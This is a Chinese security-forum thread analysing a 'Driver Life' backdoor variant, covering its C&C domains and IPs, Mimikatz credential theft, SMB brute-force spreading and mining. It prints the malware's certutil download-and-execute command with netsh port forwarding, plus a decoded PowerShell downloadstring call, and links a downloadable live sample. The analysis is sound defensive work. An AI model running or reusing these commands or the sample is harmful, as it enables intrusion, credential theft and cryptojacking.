吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 37308|回复: 93
收起左侧

[PC样本分析] “驱动人生”后门变种

  [复制链接]
616804390 发表于 2019-2-27 14:03
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 616804390 于 2019-6-10 20:57 编辑

在近期排查几台服务器的过程中,发现了“驱动人生”后门变种,从木马中提取的相关域名和ip如下:

v.beahh.com/o.beahh.com/new.beahh.com/cert.beahh.com/loop.hqo.net/w.beahh.com

C&C端ip: 172.104.73.9/172.104.78.101/153.92.4.49

病毒MD5:96bdb44e072122ee05fb8e729063463c

病毒名称svchost.exe

该木马运行后会释放一个m.ps1 PowerShell运行程序,此程序会调用Mimikatz脚本,进行本机用户和密码的抓取, 同时创建计划任务,每天7点自动向w.beahh.com发送http请求下载域名解析后服务器上的程序,并以HTA(内含微软某CVE漏洞的payload)运行方式执行的命令。

该木马会发送基于445端口的SMB数据包,同时具有扫描内网和外网开放445端口的ip,即便已安装永恒之蓝的补丁,也无法遏制内网传播,一旦开启了SMB服务则有可能会中毒,该木马是利用445端口进行SMB域账户爆破,该病毒实施的SMB爆破行为,是基于SMBV2协议的一种攻击方式,且木马中内置弱口令账户和密码,同通过IPC$空连接进行SMB服务的账户爆破或登陆。



该病毒获取到用户名或密码时,无论是爆破还是抓取到的用户名密码,通过IPC$登陆后,对中病毒机器执行以下命令进行远程下载执行,同时设置端口转发,将来自65532端口的流量转发到1.1.1.1地址的53端口,将来自65531端口的流量转发到1.1.1.1地址的53端口。

cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53

病毒同时也会创建可写文件update.exe文件。


分析update.exe如下:

该文件中发送指令通过RSA算法进行加密,        获取指令后通过编码RSA公钥进行解密,最终执行远程命令。
文件中对I am the mxr report进行互斥体判断,打开互斥体,即mxr(门罗币挖矿)程序。


病毒拥有远控功能,运行后将本机的CUP型号,操作系统版本,MAC地址,ip地址,域用户名,显卡信息,挖矿线程,以及计算机参数传递给终端:

该脚本新增一个计划任务,计划每天7:00运行C:\windows\temp\svchost.exe程序,同时向域名端发送远程下载执行命令,加密内容解密后为:
(NewObjectNet.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)


病毒拥有识别以下游戏进程功能:
crossfire.exe|war3.exe|metor.exe|KartRider.exe|ra2.exe|wow.exe|wow64.exe|xy3launch.exe|cstrike.exe|gtavc.exe|crossfire.exe|MIR2.exe|mir3.exe|JX3Client.exe|cstrikeonline.exe|qqfo.exe|DNFchina.exe|xypqlayer.exe|palonline.exe|digimon.exe|DNF.exe|FF2Client.exe|LolClient.exe|KartRider.exe|dota.exe|dota2.exe|TslGame.exe,

病毒具有识别以下杀毒软件的功能:|360tray.exe|360sd.exe|avp.exe|vMonXP.exe|RavMonD.exe|Mcshield.exe|egui.exe|kxetray.exe|knsdtray.exe|TMBMSRV.exe|avcenter.exe|ashDisp.exe|rtvscan.exe|ksafe.exe|QQPCRTP.exe

在排查的服务器上并未发现病毒有挖矿功能的挖矿行为,由于病毒功能黑客可远程执行,黑客应该是在通过传播广泛后,在肉鸡量足够多时,统一执行,且发现黑客的病毒也在不断更新中。

附病毒样本:链接: https://pan.baidu.com/s/13CJr6Zs7vyytkTISx0xofA 提取码: mp4k   文件大小:
7.9M(也是第一次见这么大的马子)



w1.png
木马相关命令.png
xiugai.png
m.ps1脚本.png
内网扫描.png
syn请求.png
1.png
通过SMBv2进行tcp爆破.png

免费评分

参与人数 25威望 +1 吾爱币 +29 热心值 +23 收起 理由
金戋夕夕夕夕 + 1 + 1 我很赞同!
Dr.k + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
damao199381 + 1 + 1 我很赞同!
沉默空格剑 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
ruiyang + 1 + 1 谢谢@Thanks!
懵逼猫咪 + 1 我很赞同!
晒太阳的猫 + 1 + 1 热心回复!
会飞的丑小鸭 + 3 + 1 谢谢@Thanks!
夏520 + 2 + 1 我很赞同!
hsaihuaer + 1 + 1 谢谢@Thanks!
简短的J + 1 + 1 热心回复!
独行风云 + 1 + 1 用心讨论,共获提升!
huangsijun17 + 1 + 1 谢谢@Thanks!
dwj0 + 1 + 1 谢谢@Thanks!
温柔的笑 + 1 我很赞同!
Minesa + 1 + 1 谢谢@Thanks!
Conquest + 1 + 1 用心讨论,共获提升!
ycc714 + 1 + 1 我很赞同!
金鍂鑫 + 1 + 1 谢谢@Thanks!
lwang + 1 谢谢@Thanks!
willJ + 1 + 6 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
whj888 + 1 用心讨论,共获提升!
wahson + 1 + 1 用心讨论,共获提升!
Ftimes + 1 用心讨论,共获提升!
hfg123 + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

JuncoJet 发表于 2019-2-27 14:21
hackcat 发表于 2019-3-18 16:36
ming_83 发表于 2019-2-28 11:29
这个楼主说话不说全,不说是哪个版本的驱动人生(最新官方版的吗)也不说怎么查杀这个病毒,

查杀的话基本上就是把计划任务啥的删了,进程关了,对应的文件删了就OK了。附专杀,还凑合。会有漏删。结合火绒更方便。
链接: https://pan.baidu.com/s/18oWYtzFsCmMTES-jGMKxNg 提取码: be1v 复制这段内容后打开百度网盘手机App,操作更方便哦
China菜鸟 发表于 2019-2-27 14:07
hcljq425 发表于 2019-2-27 14:20
学习学习~
wm378802548 发表于 2019-2-27 14:21
.....卧槽..上周刚给新买的笔记本下驱动人生更新驱动
c3097 发表于 2019-2-27 14:22
已收到通知,谢谢分享。
zheng123 发表于 2019-2-27 14:27
学习了,谢谢!!!!!!!!!
shusiying 发表于 2019-2-27 14:46
学习了,谢谢!!!!!!!!!
lxj8shy 发表于 2019-2-27 14:52
谢谢分享!!
abc6040927 发表于 2019-2-27 14:53
驱动人生的防护不是很好看来
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 10:00

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表